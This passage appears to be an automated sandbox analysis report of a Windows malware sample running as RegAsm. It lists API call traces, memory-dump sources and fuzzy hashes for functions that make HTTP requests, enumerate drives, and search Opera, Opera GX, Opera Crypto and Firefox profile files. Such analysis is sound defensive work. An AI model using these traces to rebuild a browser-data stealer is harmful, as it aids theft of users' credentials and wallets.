                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404285
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 004042BB
                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042DF
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042EA
                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404308
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404360
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404392
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040439B
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004043A4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                                  • String ID: GET
                                                                                                                                                                                                                                                                  • API String ID: 1687531150-1805413626
                                                                                                                                                                                                                                                                  • Opcode ID: 3e5564a870a27417cf46eba37ab5099a00ce7b7e59e4c09bbcd249fd77c5e8aa
                                                                                                                                                                                                                                                                  • Instruction ID: c4ff353b26ca2936590122ceef1c82b8242eae7be842382444ee261e2db76ed5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e5564a870a27417cf46eba37ab5099a00ce7b7e59e4c09bbcd249fd77c5e8aa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 715180B2900219AFDF10DFE0CC85AEFBBBDEB49744F10112AFA11B6190D7785E858B65
                                                                                                                                                                                                                                                                  Function 00415BC6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 133stringfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00415BCB
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00415BEE
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00415C05
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004268D4), ref: 00415C27
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004268D8), ref: 00415C41
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00415C76
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00415C89
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00415C9D
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00415CAD
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,004268DC), ref: 00415CBF
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00415CD3
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00415D6D
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00415D7C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                                                                                  • String ID: %s\%s
                                                                                                                                                                                                                                                                  • API String ID: 2282932919-4073750446
                                                                                                                                                                                                                                                                  • Opcode ID: ce71aef62abef621f80aff9973deaaaae97e03204973064a8a74a4f4b98bcba4
                                                                                                                                                                                                                                                                  • Instruction ID: f32957f4585b5af1fae8c999d09262e5e24cc4202797a4ac40e028ac13c9c202
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce71aef62abef621f80aff9973deaaaae97e03204973064a8a74a4f4b98bcba4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09513FB2800219ABCF10EBB1DD49ADE7B7DBF59314F0444AAF605E3051E7399789CBA4
                                                                                                                                                                                                                                                                  Function 00409FC5 Relevance: 23.4, APIs: 8, Strings: 5, Instructions: 628fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00409FCA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425C06,00000000,-00000020,00000000), ref: 0040A049
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425E68), ref: 0040A0A3
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425E6C), ref: 0040A0BD
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera,00425C13,00425C12,00425C0F,00425C0E,00425C0B,00425C0A,00425C07), ref: 0040A150
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A164
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A178
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                  • String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                                                                  • API String ID: 3869166975-536343317
                                                                                                                                                                                                                                                                  • Opcode ID: b52eab3a6815ed49cefb5586dc1aa422f4cc1b01995f7dfad9cc985fb07e9c68
                                                                                                                                                                                                                                                                  • Instruction ID: ea3a79174f4d2047dc566d2b1852688a17d13d676ef7a484e91dd8d862b914bc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b52eab3a6815ed49cefb5586dc1aa422f4cc1b01995f7dfad9cc985fb07e9c68
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A428D70904288EACF15EBA5C955BDDBBB46F29308F5440BEE409732C2DB781B4CCB66
                                                                                                                                                                                                                                                                  Function 00415947 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 151stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0041594C
                                                                                                                                                                                                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004159AE
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004159CD
                                                                                                                                                                                                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 004159D6
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 004159F6
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00415A14
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: _EH_prolog.MSVCRT ref: 004154FF
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: wsprintfA.USER32 ref: 00415525
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: FindFirstFileA.KERNEL32(?,?), ref: 0041553C
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: memset.MSVCRT ref: 00415553
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: memset.MSVCRT ref: 00415561
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: StrCmpCA.SHLWAPI(?,0042684C), ref: 0041557F
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: StrCmpCA.SHLWAPI(?,00426850), ref: 00415599
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: wsprintfA.USER32 ref: 004155BD
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: StrCmpCA.SHLWAPI(?,0042655E), ref: 004155CE
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: wsprintfA.USER32 ref: 004155F4
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: memset.MSVCRT ref: 0041561A
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: lstrcat.KERNEL32(?,?), ref: 0041562C
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: strtok_s.MSVCRT ref: 00415665
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: memset.MSVCRT ref: 0041567A
                                                                                                                                                                                                                                                                    • Part of subcall function 004154FA: lstrcat.KERNEL32(?,?), ref: 0041568F
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00415A37
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00415A9C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                                                                                                                                                                                                                                  • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                                  • API String ID: 2879972474-147700698
                                                                                                                                                                                                                                                                  • Opcode ID: 29b0693086406cfaf3a2a035cad38e27a288f3ef43e961fefa16bbefe2720e07
                                                                                                                                                                                                                                                                  • Instruction ID: f93de844b1a18675290aa6fa134bd3a03e4539652274f487bcb42a8085c79367
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29b0693086406cfaf3a2a035cad38e27a288f3ef43e961fefa16bbefe2720e07
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F5193B1900258EBDF30EF61DC95EEE3B7CAF01348F50402AB519A6592DB385A89CB55
                                                                                                                                                                                                                                                                  Function 00401162 Relevance: 20.0, APIs: 9, Strings: 2, Instructions: 771fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00401167
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00422378), ref: 004013CA
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042237C), ref: 004013E4
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00422388,?,?,?,00422384,?,?,?,00422380,?,?), ref: 00401510
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042238C), ref: 00401832
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,0042238C), ref: 00401841
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 00401BD4
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 00401BE5
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: _EH_prolog.MSVCRT ref: 00410CC8
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: GetFileAttributesA.KERNEL32(00000000,?,0040BB15,?,00425C4E,?,?), ref: 00410CDC
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406269
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004145A2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                                  • String ID: 7$\*.*
                                                                                                                                                                                                                                                                  • API String ID: 40499504-4165053604
                                                                                                                                                                                                                                                                  • Opcode ID: df3af5913ac66384c4ac91487087571275edd9b99ba1baadde4567d7484321d1
                                                                                                                                                                                                                                                                  • Instruction ID: 8ce24c7d6f897ddb31f2fe60510d5ab534ddbf0f9374ab348d72f62bdee6a657
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df3af5913ac66384c4ac91487087571275edd9b99ba1baadde4567d7484321d1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12625C70904288EADF15E7E4D955BDDBBB86F19308F5440BEA40A735C2EB781B4CCB26
                                                                                                                                                                                                                                                                  Function 0040B4B6 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 311fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040B4BB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F68,?,?,00425C47,?,00000000,?), ref: 0040B53A
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425F6C,?,00000000,?), ref: 0040B55E
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425F70,?,00000000,?), ref: 0040B578
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F74,?,?,00425C4A,?,00000000,?), ref: 0040B614
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425F84,?,?,00000000,00425C4B,?,00000000,?), ref: 0040B719
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040B7EE
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(?,?,?,00000000,?), ref: 0040B89D
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?,?,00000000,?), ref: 0040B8AE
                                                                                                                                                                                                                                                                  Strings
